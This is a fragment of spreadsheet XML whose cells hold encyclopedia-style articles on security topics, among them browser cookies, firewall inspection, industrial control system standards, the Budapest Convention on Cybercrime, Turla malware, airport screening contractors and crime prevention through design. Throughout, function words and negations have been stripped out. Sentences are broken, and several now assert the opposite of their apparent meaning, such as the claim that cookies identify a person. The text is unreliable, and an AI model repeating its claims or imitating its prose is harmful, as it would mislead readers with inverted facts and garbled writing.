interaction", necessity user already logged website whose cookie stolen. despite this, researcher tried attack facebook friends obtained cookies social engineering. drawbacks cookies besides privacy concerns, cookies also technical drawbacks. particular, always accurately identify users, used security attacks, often odds representational state transfer (rest) software architectural style. inaccurate identification browser used computer, usually separate storage area cookies. hence, cookies identify person, combination user account, computer, browser. thus, anyone uses multiple accounts, computers, browsers multiple sets cookies.likewise, cookies differentiate multiple users share user account, computer, browser. inconsistent state client server cookies generate inconsistency state client state stored cookie. user acquires cookie clicks "back" button browser, state browser generally acquisition. example, shopping cart online shop built using cookies, content cart change user goes back browser's history: user presses button item shopping cart clicks "back" button, item remains shopping cart. this might intention user, possibly wanted undo addition item. this lead unreliability, confusion, bugs. developers therefore aware issue implement measures handle situations. alternatives cookies some operations done using cookies also done using mechanisms. json tokens json token (jwt) self-contained packet information used store user identity authenticity information. this allows used place session cookies. unlike cookies, automatically attached http request browser, jwts must explicitly attached http request application. http authentication http protocol includes basic access authentication digest access authentication protocols, allow access page user provided correct username password. server requires credentials granting access page, browser requests user and, obtained, browser stores sends every subsequent page request. this information used track user. address some users tracked based address computer requesting page. server knows address computer running browser proxy, used) could theoretically link user's session address. however, addresses generally reliable track session identify user. many computers designed used single user, office home pcs, behind network address translator (nat). </t>
  </si>
  <si>
    <t>Context-based access control</t>
  </si>
  <si>
    <t>context-based access control (cbac) feature firewall software, intelligently filters packets based application layer protocol session information. used intranets, extranets internets.cbac configured permit specified traffic firewall connection initiated within network needing protection. words, cbac inspect traffic sessions originate external network.) however, example discusses inspecting traffic sessions originate external network, cbac inspect traffic sessions originate either side firewall. this basic function stateful inspection firewall.without cbac, traffic filtering limited access list implementations examine packets network layer, most, transport layer. however, cbac examines network layer transport layer information also examines application-layer protocol information (such connection information) learn state session. this allows support protocols involve multiple channels created result negotiations control channel. most multimedia protocols well protocols (such ftp, rpc, sql*net) involve multiple control channels. cbac inspects traffic travels firewall discover manage state information sessions. this state information used create temporary openings firewall's access lists allow return traffic additional data connections permissible sessions (sessions originated within protected internal network). cbac works deep packet inspection hence cisco calls 'ios firewall' internetwork operating system (ios). cbac also provides following benefits: denial-of-service prevention detection real-time alerts audit trails also references</t>
  </si>
  <si>
    <t>Contract for the Web</t>
  </si>
  <si>
    <t>contract initiative world wide foundation november 2019 attempt address issues political manipulation, fake news, privacy violations, malign forces internet. history initiative product work year people drawn government, businesses general public. initiative plan outlines nine central principles, three directed governments, companies individuals. launched november 2019 berners-lee world wide foundation, occurring start internet governance forum meeting berlin.endorsing governments, companies individuals make commitments protecting abuse ensuring benefits humanity. commitment understood non-binding. principles contract indicates principles governments, companies, citizens: "ensure everyone connect internet". "keep internet available, time". "respect protect people’s fundamental online privacy data rights". "make internet affordable accessible everyone". "respect protect people’s privacy personal data build online trust". "develop technologies support best humanity challenge worst". creators collaborators web". "build strong communities respect civil discourse human dignity". "fight web". adoption launch plan backed organisations including names google, microsoft facebook. despite backing plan, facebook appeared ignoring berners-lee's request mark zuckerberg cease targeted political adverts 2019 united kingdom general election. yasmin alibhai-brown gave opinion united kingdom's news': "it’s good game megalomaniacs carry worst". references sources alibhai-brown, yasmin november 2019). "the 'contract web' good tech megalomaniacs carry worst". news. archived original november 2019. retrieved november 2019. staff november 2019). "contract web: berners-lee launches global action plan". newsround. archived original november 2019. retrieved november 2019. cellan-jones, rory november 2019). "sir berners-lee attacks tories misinformation". bbc. archived original november 2019. retrieved november 2019. staff november 2019). "web inventor berners-lee launches plan stop internet abuse". archived original november 2019. retrieved november 2019. official website november 2019). "contract web". archived original november 2019. retrieved november 2019. sample, november 2019). "tim berners-lee unveils global plan save web". guardian. archived original november 2019. retrieved november 2019. staff november 2019). "www inventor berners-lee warns 'digital dystopia' launches 'web contract'". news. archived original november 2019. retrieved november 2019. further reading berners-lee, november 2019). "igf 2019 saal europa launch contract raw". archived original november 2019. retrieved november 2019. external links official website this article incorporates text available license.</t>
  </si>
  <si>
    <t>Control system security</t>
  </si>
  <si>
    <t>industrial control system (ics) cybersecurity prevention (intentional unintentional) interference proper operation industrial automation control systems. these control systems manage essential services including electricity, petroleum production, water, transportation, manufacturing, communications. they rely computers, networks, operating systems, applications, programmable controllers, could contain security vulnerabilities. 2010 discovery stuxnet worm demonstrated vulnerability systems cyber incidents. united states governments passed cyber-security regulations requiring enhanced protection control systems operating critical infrastructure. control system security known several names scada security, security, industrial network security, industrial control system (ics) cybersecurity, operational technology (ot) security control system cyber security. risks insecurity vulnerabilities inherent industrial automation control systems (iacs) lead severe consequences categories safety, loss life, personal injury, environmental impact, lost production, equipment damage, information theft, company image. guidance assess, evaluate mitigate potential risks provided application many governmental, regulatory, industry documents global standards, addressed below. vulnerability control systems industrial automation control systems become vulnerable security incidents following trends occurred last years. heavy commercial off-the shelf technology (cots) protocols. integration technology windows, sql, ethernet means process control systems vulnerable viruses, worms trojans affect systems enterprise integration (using plant, corporate even public networks) means process control systems (legacy) subjected stresses designed demand remote access 24/7 access engineering, operations technical support means insecure rogue connections control system security through obscurity using publicly available protocols standards detrimental system securitythe cyber threats attack strategies automation systems changing rapidly. fortunately, regulation control system security rare regulation slow moving process. united states, example, nuclear power chemical industries. government efforts u.s. government computer emergency readiness team (us-cert) originally instituted control systems security program (cssp) national cybersecurity communications integration center (nccic) industrial control systems, made available large free national institute standards technology (nist) standards documents regarding control system security. u.s. government joint capability technology demonstration (jctd) known mosiacs (more situational awareness industrial control systems) initial demonstration cybersecurity defensive capability critical infrastructure control systems. mosaics addresses department defense (dod) operational need cyber defense capabilities defend critical infrastructure control systems cyber attack, power, water wastewater, safety controls, affect physical environment. mosaics jctd prototype shared commercial industry industry days research development, approach intended lead innovative, game-changing capabilities cybersecurity critical infrastructure control systems. industrial cybersecurity standards international standard cybersecurity industrial automation 62443. addition, multiple national organizations nist nerc released guidelines requirements cybersecurity control systems. 62443 62443 cybersecurity standard defines processes, techniques requirements industrial automation control systems (iacs). documents result standards creation process national committees involved agree upon common standard. 62443 influenced partly based ansi/isa-99 series standards vdi/vde 2182 guidelines. 62443 standards technical reports organized four general categories called general, policies procedures, system component. first category includes foundational information concepts, models terminology. second category work products targets asset owner. these address various aspects creating maintaining effective iacs security program. third category includes work products describe system design guidance requirements secure integration control systems. core zone conduit design model. fourth category includes work products describe specific product development technical requirements control system products. nerc widely recognized modern nerc security standard nerc 1300, modification/update nerc 1200. latest version nerc 1300 called cip-002-3 cip-009-3, referring critical infrastructure protection. these standards used secure bulk electric systems although nerc created standards within areas. bulk electric system standards also provide network security administration still supporting best-practice industry processes. nist nist cybersecurity framework (nist csf) provides high-level taxonomy cybersecurity outcomes methodology assess manage outcomes. intended help private sector organizations provide critical infrastructure guidance protect it.nist special publication 800-82 rev. "guide industrial control system (ics) security" describes secure multiple types industrial control systems cyber-attacks considering performance, reliability, safety requirements specific ics. control system security certifications certifications control system security established several global certification bodies. most schemes based 62443 describe test methods, surveillance audit policy, public documentation policies, specific aspects program. external links 62443 nist webpage nerc critical infrastructure protection (cip) standards cpni internet things industrial control systems references</t>
  </si>
  <si>
    <t>Controlled Access Protection Profile</t>
  </si>
  <si>
    <t>controlled access protection profile, also known capp, common criteria security profile specifies functional assurance requirements information technology products. software systems conform capp standards provide access controls capable enforcing access limitations individual users data objects. capp-conformant products also provide audit capability records security-relevant events occur within system. capp intended protection software systems users assumed non-hostile well-managed, requiring protection primarily threats inadvertent casual attempts breach security protections. intended applicable circumstances protection required determined attempts hostile well-funded attackers. fully address threats posed malicious system development administrative personnel, generally higher level access. capp derived requirements class u.s. department defense trusted computer system evaluation criteria material upon requirements based. external links controlled access protection profile</t>
  </si>
  <si>
    <t>Controlled Cryptographic Item</t>
  </si>
  <si>
    <t>controlled cryptographic item (cci) u.s. national security agency term secure telecommunications information handling equipment, associated cryptographic component hardware item performs critical communications security (comsec) function. items designated unclassified subject special accounting controls required markings. part physical security protection given comsec equipment material afforded special handling accounting. equipment must controlled manner affords protection least equal high value equipment, money, computers, privacy act-controlled. there separate channels used handling equipment materials: "the comsec channel" "the administrative channel." comsec channel, called comsec material control system, used distribute accountable comsec items classified equipment, keying material, maintenance manuals. some military departments authorized distribute equipment standard logistics system. comsec channel composed series comsec accounts, appointed comsec custodian personally responsible accountable comsec materials charged his/her account. comsec custodian assumes accountability equipment material upon receipt, controls dissemination authorized individuals requirements need-to-know basis. administrative channel used distribute comsec information accountable comsec material control system. persons access comsec materials asked, among restrictions, avoid unapproved travel countries adversaries united states, establishments facilities within u.s. references further reading</t>
  </si>
  <si>
    <t>NetTransformer</t>
  </si>
  <si>
    <t>nettransformer cross-platform, network discovery program. software created idea discovering snmp queries networks state produce various data models data models inputs transform network "state" another. original author used nettransformer demonstrate network transformation network ipv4 ipv6 state. transformation long lasting process typically driven strategy passes many states. example, initial state current state network services offered ipv4 only. long-term goal network service ipv6 only. achieve pass many intermediate states depending transformation strategy. from network mapping perspective nettransformer generates distinct data models. hierarchical device centric data model network device (containing information device, metadata, ports, interfaces protocol neighbors) graph based device centric data model graphml file format (produced xslt transformation device data xml) graph based network centric data model graphml (this network wide model produced merging device centric graphmls).the software generating topology views network topology diff views network centric data model. thus people simply network mapping. important concepts network treated separate project. since many kinds networks years appeared various kinds project types. example: "snmp network discovery" discovering networks; "snmp peering map" generating internet peering autonomous systems maps snmp "free graph" working kind graph using rest diff visualization capabilities software.</t>
  </si>
  <si>
    <t>Convention on Cybercrime</t>
  </si>
  <si>
    <t>convention cybercrime, also known budapest convention cybercrime budapest convention, first international treaty seeking address internet computer crime (cybercrime) harmonizing national laws, improving investigative techniques, increasing cooperation among nations. drawn council europe strasbourg, france, active participation council europe's observer states canada, japan, philippines, south africa united states. convention explanatory report adopted committee ministers council europe 109th session november 2001. opened signature budapest, november 2001 entered force july 2004. december 2020, states ratified convention, four states signed convention ratified it.since entered force, important countries like brazil india declined adopt convention grounds participate drafting. russia opposes convention, stating adoption would violate russian sovereignty, usually refused cooperate enforcement investigations relating cybercrime. first multilateral legally binding instrument regulate cybercrime. since 2018, india reconsidering stand convention surge cybercrime, though concerns sharing data foreign agencies remain.on march 2006, additional protocol convention cybercrime came force. those states ratified additional protocol required criminalize dissemination racist xenophobic material computer systems, well threats insults motivated racism xenophobia. objectives convention first international treaty crimes committed internet computer networks, dealing particularly infringements copyright, computer-related fraud, child pornography, hate crimes, violations network security. also contains series powers procedures search computer networks lawful interception. main objective, preamble, pursue common criminal policy aimed protection society cybercrime, especially adopting appropriate legislation fostering international cooperation. convention aims principally harmonizing domestic criminal substantive elements offenses connected provisions area cyber-crime providing domestic criminal procedural powers necessary investigation prosecution offenses well offenses committed means computer system evidence relation electronic form setting fast effective regime international cooperationthe following offenses defined convention: illegal access, illegal interception, data interference, system interference, misuse devices, computer-related forgery, computer-related fraud, offenses related child pornography, offenses related copyright neighboring rights. also sets procedural issues expedited preservation stored data, expedited preservation partial disclosure traffic data, production order, search seizure computer data, real-time collection traffic data, interception content data. addition, convention contains provision specific type trans-border access stored computer data require mutual assistance (with consent publicly available) provides setting 24/7 network ensuring speedy assistance among signatory parties. further, conditions safeguards, convention requires provision adequate protection human rights liberties, including rights arising pursuant obligations european convention human rights, international covenant civil political rights, applicable international human rights instruments, shall incorporate principle proportionality.the convention product four years work european international experts. supplemented additional protocol making publication racist xenophobic propaganda computer networks criminal offense, similar criminal libel laws. currently, cyber terrorism also studied framework convention. accession united states ratification united states senate unanimous consent august 2006 praised condemned. united states became 16th nation ratify convention. convention entered force united states january 2007. senate majority leader bill frist said: "while balancing civil liberty privacy concerns, treaty encourages sharing critical electronic evidence among foreign countries enforcement effectively investigate combat crimes".the electronic privacy information center said: convention includes list crimes signatory state must transpose law. requires criminalization activities hacking (including production, sale, distribution hacking tools) offenses relating child pornography, expands criminal liability intellectual property violations. also requires signatory state implement certain procedural mechanisms within laws. example, enforcement authorities must granted power compel internet service provider monitor person's activities online real time. finally, convention requires signatory states provide international cooperation widest extent possible investigations proceedings concerning criminal offenses related computer systems data, collection evidence electronic form criminal offense. enforcement agencies assist police participating countries cooperate mutual assistance requests. although common legal framework would eliminate jurisdictional hurdles facilitate enforcement borderless cyber crimes, complete realization common legal framework possible. transposing convention provisions domestic difficult especially requires incorporation substantive expansions counter constitutional principles. instance, united states able criminalize offenses relating child pornography stated convention, specifically virtual child pornography, first amendment's free speech principles. under article 9(2)(c) convention, child pornography includes "realistic images representing minor engaged sexually explicit conduct". according convention, united states would adopt virtual child pornography well, however, u.s. supreme court, ashcroft free speech coalition, struck unconstitutional provision cppa prohibited "any visual depiction" "is, appears minor engaging sexually explicit conduct". response rejection, u.s. congress enacted protect amend provision, limiting visual depiction "that indistinguishable from, minor engaging sexually explicit conduct" u.s.c. 2252(b)(b)). accession non–council europe states convention signed canada, japan, united states, south africa november 2001, budapest. july 2016, non–council europe states ratified treaty australia, canada, dominican republic, israel, japan, mauritius, panama, lanka, united states. october 2013, press release, foreign ministry colombia stated council europe invited colombia adhere convention budapest. march 2020, colombia adhered convention filing adhesion document colombia government agreement council europe.although egypt signed convention, egyptian president sisi's government 2018 legislated major computer-crime related laws. targeting social networking service facebook twitter, legislation criminalizes fake news terrorism, setting flag accounts carry 5,000 subscribers followers. early legislation criticized amnesty international, thus websites appeal courts within days blacklisting.in fact india "was reconsidering position becoming member budapest convention surge cyber crime, especially push digital india." also cyberstalking legislation list council europe treaties 2015 u.s. china cybersecurity agreement references further reading dennis jlussi: handle care, panic criminalisation hacker tools german criminal effect security professionals, hanover 2007. view online download file. center democracy technology united states department justice computer crime intellectual property section council europe convention cybercrime external links convention cybercrime homepage council europe</t>
  </si>
  <si>
    <t>Turla (malware)</t>
  </si>
  <si>
    <t>turla uroboros trojan package suspected computer security researchers western intelligence officers product russian government agency name. malware turla targeting governments militaries since least 2008.in december 2014 evidence targeting operating systems running linux. group advanced persistent threat hacking group also named turla. goodin technica described turla "russian spies". turla since given names snake, krypton, venomous bear. also agent.btz october (malware) references</t>
  </si>
  <si>
    <t>Netco Government Services</t>
  </si>
  <si>
    <t>previously known netco government services, privately held business headquartered herndon, virginia, u.s. provides network services various branches government. history 2006 company purchased harris corporation made sect known harris (information technology services). harris corp located melbourne, florida. netco's predecessor company, wam!net, founded 2000 minnesota substantially taken $100 million investment 2001 cerberus capital management. wam!net's commercial business rights name wam!net sold july 2003 savvis, part handled government contracts, specifically navy-marine corps intranet contract (nmci), renamed netco. nmci continues main source revenue. company claims employees nationwide, majority holding security clearances. netco provides network infrastructure support services government agencies including bureau alcohol, tobacco, firearms, explosives (atf), department defense (dod), department energy (doe), federal aviation administration (faa), national reconnaissance office (nro), national security agency (nsa), office naval research (onr), u.s. marine corps, u.s. navy. netco purchased multimax force contracts assumed name 2006. netco, technically, longer exists. references kelley, matt. "cerberus business network reaches far." today. january 2006. external links harris corporation multimax company website</t>
  </si>
  <si>
    <t>Need to know</t>
  </si>
  <si>
    <t>term "need know", used government organizations (particularly related military espionage), describes restriction data considered sensitive. under need-to-know restrictions, even necessary official approvals (such security clearance) access certain information, would given access information, read clandestine operation, unless specific need know; access information must necessary conduct one's official duties. this term also includes anyone people knowledge deemed necessary share with. security mechanisms, make difficult unauthorized access occur, without inconveniencing legitimate access. need-to-know also aims discourage "browsing" sensitive material limiting access smallest possible number people. examples battle normandy 1944 example need-to-know restriction. though thousands military personnel involved planning invasion, small number knew entire scope operation; rest informed data needed complete small part plan. true trinity project, first test nuclear weapon 1945. problems criticism like security measures, need know misused persons wish refuse others access information hold attempt increase personal power, prevent unwelcome review work, prevent embarrassment resulting actions thoughts. need know also invoked hide extra-legal activities. this considered necessary use, detrimental abuse policy considered different perspectives. need know detrimental workers' efficiency. even done good faith, might fully aware actually need know information, resulting inefficiencies people inevitably withheld information require perform duty. speed computations mechanical calculators alamos dramatically increased calculators' operators told numbers meant: what work machines punching holes, numbers understand. nobody told was. thing going slowly. said first thing technical guys know we're doing. oppenheimer went talked security special permission could give nice lecture doing, excited: "we're fighting war! is!" they knew numbers meant. pressure came higher, meant energy released, they knew doing. complete transformation! they began invent ways better. they improved scheme. they worked night. they need supervising night; need anything. they understood everything; invented several programs used. computer technology discretionary access control mechanisms operating systems used enforce need know. case, owner file determines whether another person access. need know often concurrently applied mandatory access control schemes, lack official approval (such clearance) absolutely prohibit person accessing information. this need know subjective assessment. mandatory access control schemes also audit accesses, order determine need know violated. term also used concept graphical user interface design computers controlling complex equipment airplanes. usage, many different pieces data dynamically competing finite user interface space, safety-related messages given priority. also compartmentalization (information security) freedom information laws country mushroom management principle least privilege security obscurity references</t>
  </si>
  <si>
    <t>Trustworthy computing</t>
  </si>
  <si>
    <t>term trustworthy computing (twc) applied computing systems inherently secure, available, reliable. particularly associated microsoft initiative name, launched 2002. history until 1995, restrictions commercial traffic internet.on, 1995, bill gates sent "internet tidal wave" memorandum microsoft executives assigning "...the internet highest level importance..." microsoft's windows released without browser microsoft developed one. success caught surprise 1995, testing server, august 1995, launched major online service, msn.the national research council recognized rise internet simultaneously increased societal reliance computer systems increasing vulnerability systems failure produced important report 1999, "trust cyberspace". this report reviews cost un-trustworthy systems identifies actions required improvement. microsoft trustworthy computing bill gates launched microsoft's "trustworthy computing" initiative january 2002 memo, referencing internal whitepaper microsoft senior vice president craig mundie. move reportedly prompted fact "...had fire larger customers–government agencies, financial companies others–about security problems windows, issues brought front center series self-replicating worms embarrassing attacks." code red, nimda, klez slammer. four areas identified initiative's areas: security, privacy, reliability, business integrity, despite initial scepticism, 10-year anniversary generally accepted "...made positive impact industry...". trustworthy computing campaign main reason easter eggs disappeared windows, office microsoft products. also security development lifecycle references external links trusted computing group wave systems corp. managing trusted computing platforms (tpm) corporate open source enlightenment, paul ferris, press controversy trusted computing, catherine flick, university sydney email bill gates microsoft employees, wired news, january, 2002 trust cyberspace, committee information systems trustworthiness trustworthy computing, microsoft trustworthy computing, craig mundie, microsoft</t>
  </si>
  <si>
    <t>Covenant Aviation Security</t>
  </si>
  <si>
    <t>covenant aviation security, (cas) chicago company provides security services aviation industry. michael bolles president since july 2012. activities covenant aviation security provides airport security services transportation security administration's screening partnership program (spp). 2002, awarded multiple contracts providing commercial screening services privatization pilot program initiated aviation transportation security act. mobilized hired 1,200 screening personnel francisco international airport tupelo regional airport within weeks contract award. 2005, awarded screening contract sioux falls regional airport (which first airport de-federalize workforce spp).in 2005, u.s. department homeland security designated airport passenger baggage screening services anti-terrorist technology support anti-terrorism fostering effective technologies 2002. also year, awarded screening contract sioux falls international airport (fsd). provides security services john kennedy international airport, laguardia airport, orlando international airport, francisco international airport. security services security services include limited following: passenger baggage screening, direct access control, personnel screening, cargo screening, cctv monitoring, report management, security assessments, operate screening equipment (x-ray, explosive trace detection, walk-through metal detector hand-held metal detector), monitoring perimeter intrusion detection systems. clients include federal government (tsa), port airport authorities select airlines. locations covenant largest providers security screening contract screening partnership program. francisco international airport (sfo) francisco/san mateo county, california former locations since awarded contracts nine airports formerly contracted covenant companies. sioux falls regional airport (fsd) sioux falls, south dakota (replaced trinity technology group, inc. september 2011) tupelo regional airport (tup) tupelo, mississippi (replaced trinity technology group, inc. 2006 vmd-mt security august 2012) sidney-richland municipal airport (sdy) sidney, montana (replaced trinity technology group, inc. august 2009) glendive dawson community airport (gdv) glendive, montana (replaced trinity technology group, inc. august 2009) glasgow international airport (ggw) glasgow, montana (replaced trinity technology group, inc. august 2009) havre city county airport (hvr) havre, montana (replaced trinity technology group, inc. august 2009) clayton airport (olf) wolf point, montana (replaced trinity technology group, inc. august 2009) lewistown municipal airport (lwt) lewistown, montana (replaced trinity technology group, inc. august 2009) miles city airport (mls) miles city, montana (replaced trinity technology group, inc. august 2009) industry affiliations american association airport executives (aaae) aaae world's largest professional organization airport executives, representing thousands airport management personnel public-use commercial general aviation airports. aaae's members represent airports hundreds companies organizations support airports. aaae serves membership results-oriented representation washington, d.c. delivers wide range industry services professional development opportunities including training, meetings conferences, highly respected accreditation program. airports council international north america (aci-na) aci-na represents local, regional state governing bodies operate commercial airports united states canada. aci-na's members enplane percent domestic virtually international airline passenger cargo traffic north america. mission aci-na advocate policies provide services strengthen ability commercial airports serve passengers, customers communities. national safe skies alliance (safeskies). national safe skies alliance, inc. (safe skies) non-profit organization works airports, government, industry maintain aviation security system. controversy undercover tests screeners november 2006 report department homeland security office inspector general found officials collaborated francisco international airport screeners undercover tests. tests whether screeners properly inspecting passengers carry-on luggage security checkpoints. from august 2003 2004, precise physical descriptions undercover personnel test checkpoints communicated screeners. according francisco chronicle, report stated officials covenant managers airport "notified screening personnel advance tester approaching checkpoint provided descriptions", "officials airport's screening control center tracked undercover testers surveillance cameras foot, report said, 'broadcast descriptions locations testers checkpoints assist supervisors identifying testers facilitate passing covert penetration tests.'" article newspaper wrongful firing lawsuit related events reported according allegations lawsuit "posing passengers, decoys take dummy bombs, unloaded guns contraband airport's security checkpoints. lawsuit said covenant tracked decoys closed-circuit television cameras tipped workers security gates expect test." handing descriptions stopped, january 2005 screeners still alerted whenever undercover operations undertaken. despite report, rehired $314 million, four-year contract airport, employees firm disciplined, none lost jobs. occurrence security warned test reported orlando international airport, regular warning different descriptions undercover agents time. mississippi representative bennie thompson said report troubling, observing: "how public expected confidence screening systems managers game system?" campaign contributions november 2010, news reported representative john mica (r-fla), pushing airports private contractors lieu tsa, since 2006 received $1,700 gerald berry campaign contributions. mica's spokesman said contributions improperly influenced mica. also firstline transportation security references external links official website "review allegations regarding francisco international airport, department homeland security office inspector general, october 2006 website aaae website aci-na website safety website</t>
  </si>
  <si>
    <t>Crime forum</t>
  </si>
  <si>
    <t>crime forum generic term internet forum specialising computer crime internet fraud activities hacking, online identity theft, phishing, pharming, malware attacks spamming. during early days internet public dial bbses would serve miscreants touch another share tips credit card fraud, hacking illicit services.by 2000s rise web, modern internet forum software preferred, private invite-only sites long lived. sites like shadowcrew, counterfeitlibrary.com russian language carderplanet.com would specialise various illegal activities eventually succumbing enforcement action.by 2015 notorious forums darkode would infiltrated dismantled prior returning increased security.as july 2015 estimated several hundred forums. also carding (fraud) darknet market hacker (computer security) hacker group operation shrouded horizon references</t>
  </si>
  <si>
    <t>Crime prevention through environmental design</t>
  </si>
  <si>
    <t>crime prevention environmental design (cpted) agenda manipulating built environment create safer neighborhoods. originated america around 1960, urban renewal strategies felt destroying social framework needed self-policing. architect oscar newman created concept ‘defensible space’, developed criminologist jeffery coined term cpted. growing interest environmental criminology detailed study specific topics natural surveillance, access control territoriality. "broken window" principle neglected zones invite crime reinforced need good property maintenance assert visible ownership space. appropriate environmental design also increase perceived likelihood detection apprehension, known biggest single deterrent crime. there also interest interior design prisons environment significantly affects decisions offend. wide-ranging recommendations architects include planting trees shrubs, elimination escape routes, correct lighting, encouragement pedestrian bicycle traffic streets. tests show application cpted measures overwhelmingly reduces criminal activity. history cpted originally coined formulated criminologist jeffery. limited approach, termed defensible space, developed concurrently architect oscar newman. both built previous work elizabeth wood, jane jacobs schlomo angel. jeffery's book, "crime prevention through environmental design" came 1971, work ignored throughout 1970s. newman's book, "defensible space: crime prevention urban design" came 1972. principles widely adopted mixed success. defensible space approach subsequently revised additional built environment approaches supported cpted. newman represented cpted credited jeffery originator cpted term. newman's cpted-improved defensible space approach enjoyed broader success resulted reexamination jeffery's work. jeffery continued expand multi-disciplinary aspects approach, advances published, last published 1990. jeffery cpted model comprehensive newman cpted model, limits built environment. later models cpted developed based newman model, criminologist crowe's popular. 2004, cpted popularly understood refer strictly newman/crowe type models, jeffery model treated multi-disciplinary approach crime prevention incorporates biology psychology, situation accepted even jeffery himself. (robinson, 1996). revision cpted, initiated 1997, termed generation cpted, adapts cpted offender individuality, indication jeffery's work popularly considered already part cpted. 2012 woodbridge introduced developed cpted prison showed design flaws allowed criminals keep offending. 1960s 1960s elizabeth wood developed guidelines addressing security issues working chicago housing authority, placing emphasis design features would support natural surveillability. guidelines never implemented stimulated original thinking cpted. jane jacobs' book, death life great american cities (1961) argued urban diversity vitality destroyed urban planners urban renewal strategies. challenging basic tenets urban planning time: neighborhoods isolated other; empty street safer crowded one; represents progress pedestrian. editor architectural forum magazine (1952–1964), formal training urban planning, work emerged founding text seeing cities. felt cities designed built meant general public would unable develop social framework needed effective self-policing. pointed forms urban design broke many traditional controls criminal behavior, example, ability residents watch street presence people using street night day. suggested lack "natural guardianship" environment promoted crime. jacobs developed concept crime flourishes people meaningfully interact neighbors. death life, jacobs listed three attributes needed make city street safe: clear demarcation private public space; diversity use; high level pedestrian sidewalks. schlomo angel early pioneer cpted studied noted planner christopher alexander. angel's ph.d. thesis, discouraging crime through city planning, (1968) study street crime oakland, states "the physical environment exert direct influence crime settings delineating territories, reducing increasing accessibility creation elimination boundaries circulation networks, facilitating surveillance citizenry police." asserted crime inversely related level activity street, commercial strip environment particularly vulnerable crime thinned activity, making easier individuals commit street crime. angel developed published cpted concepts 1970 work supported widely distributed united states department justice (luedtke, 1970). 1970s phrase crime prevention environmental design (cpted) first used jeffery, criminologist florida state university. phrase began gain acceptance publication 1971 book name. jeffery's work based precepts experimental psychology represented modern learning theory. (jeffery zahm, 1993:329) jeffery's cpted concept arose experiences rehabilitative project washington, d.c. attempted control school environment juveniles area. rooted deeply psychological learning theory b.f. skinner, jeffery's cpted approach emphasized role physical environment development pleasurable painful experiences offender would capacity alter behavioral outcomes. original cpted model stimulus-response (s-r) model positing organism learned punishments reinforcements environment. jeffery "emphasized material rewards physical environment control behavior" (jeffery zahm, 1993:330). major idea removing reinforcements crime, would occur. (robinson, 1996)an often overlooked contribution jeffery 1971 book outlining four critical factors crime prevention stood test time. these degrees manipulate opportunity crime occur, motivation crime occur, risk offender crime occurs, history offender might consider committing crime. first three within control potential victim last not. reasons received little attention, jeffery's work ignored throughout 1970s. jeffery's explanation that, time world wanted prescriptive design solutions, work presented comprehensive theory used identify wide range crime prevention functions drive design management standards. concurrent jeffery's largely theoretical work oscar newman george rand's empirical study crime-environment connection conducted early 1970s. architect, newman placed emphasis specific design features, emphasis missing jeffery's work. newman's "defensible space crime prevention urban design (1972) includes extensive discussion crime related physical form housing based crime data analysis york city public housing. "defensible space" changed nature crime prevention environmental design field within years publication substantial federal funding made available demonstrate study defensible space concepts. established newman, defensible space must contain components. first, defensible space allow people seen continuously. ultimately, diminishes residents' fear know potential offender easily observed, identified, consequently, apprehended. second, people must willing intervene report crime occurs. increasing sense security settings people live work, encourages people take control areas assume role ownership. when people feel safe neighborhood likely interact another intervene crime occurs. these remain central implementations cpted 2004. 1977, jeffery's second edition crime prevention through environmental design expanded theoretical approach embrace complex model behavior variable physical environments, offender behavior individuals behavior individual members general public reciprocal influences another. this laid foundation jeffery develop behavioral model aimed predicting effects modifying external environment internal environment individual offenders. 1980s 1980s, defensible space prescriptions 1970s determined mixed effectiveness. they worked best residential settings, especially settings residents relatively free respond cues increase social interaction. defensible space design tools observed marginally effective institutional commercial settings. result, newman others moved improve defensible space, adding cpted based features. they also deemphasised less effective aspects defensible space. contributions advance cpted 1980s included: "broken windows" theory, forth james wilson george kelling 1982, explored impact visible deterioration neglect neighborhoods behavior. property maintenance added cpted strategy surveillance, access control territoriality. broken windows theory hand hand cpted. crime attracted areas taken care abandoned. cpted adds pride ownership feeling community. with "broken windows" certain neighborhoods, crime continue decline eventually fall completely. canadian academicians patricia paul brantingham published environmental criminology 1981. according authors, crime takes place essential elements present. these elements consist law, offender, target, place. they characterize "the four dimensions crime", environmental criminology studying last four dimensions. british criminologists ronald clarke patricia mayhew developed "situational crime prevention" approach: reducing opportunity offend improving design management environment. criminologist timothy crowe developed cpted training programs. 1990s criminology: interdisciplinary approach (1990), jeffery's final contribution cpted. jeffery cpted model evolved assumes environment never influences behavior directly, brain. model crime prevention must include brain physical environment. because approach contained jeffery's cpted model today based many fields, including scientific knowledge modern brain sciences, focus external environmental crime prevention inadequate ignores another entire dimension cpted i.e., internal environment. (robinson, 1996)crime prevention through environmental design (1991) criminologist crowe provided solid base cpted move forward rest 1990s. from 1994 2002, sparta consulting corporation severin sorensen, managed government's largest cpted technical assistance training program titled crime prevention through environmental design (cpted) public housing technical assistance training program, funded department housing urban development. during period sorensen worked ronald clarke sparta team develop cpted curriculum used situational crime prevention underlying theoretical basis cpted measures. curriculum developed trained stakeholders public assisted housing, follow-up cpted assessments conducted various sites. sparta-led cpted projects showed statistical reductions self reported part crimes depending basket cpted measures employed specific high crime, income settings united states. 1996, oscar newman published update earlier cpted works, titled, creating defensible space, institute community design analysis, office planning development research (pdr), department housing urban development (hud). 1997, article greg saville gerry cleveland, generation cpted, exhorted cpted practitioners consider original social ecology origins cpted, including social psychological issues beyond built environment. 2000s 2004, elements cpted approach gained wide international acceptance enforcement efforts embrace cpted term "environment" commonly used refer external environment place. jeffery's intention cpted also embrace internal environment offender seems lost, even promoting expansion cpted include social ecology psychology banner generation cpted. 2012 woodbridge introduced developed concept cpted within prison environment, place crime still continues conviction. jeffery's understanding criminal mind study rehabilitative facilities forty years used reduce crime type facilities. woodbridge showed prison design allowed offending continue introduced changes reduce crime. cpted techniques increasingly benefiting integration design technologies. instance, models proposed buildings developed building information modelling imported video game engines assess resilience different forms crime. strategies built environment cpted strategies rely upon ability influence offender decisions precede criminal acts. research criminal behavior shows decision offend offend influenced cues perceived risk caught cues reward ease entry. certainty caught main deterrence criminals severity punishment raising certainty captured, criminal actions decrease. consistent research, cpted based strategies emphasise enhancing perceived risk detection apprehension. consistent widespread implementation defensible space guidelines 1970s, implementations cpted 2004 based solely upon theory proper design effective built environment reduce crime, reduce fear crime, improve quality life. built environment implementations cpted seek dissuade offenders committing crimes manipulating built environment crimes proceed occur. main concepts according moffat territoriality, surveillance, access control, image/maintenance, activity support target hardening. applying strategies trying prevent crime neighborhood crime ridden not. natural surveillance access control strategies limit opportunity crime. territorial reinforcement promotes social control variety measures. image/maintenance activity support provide community 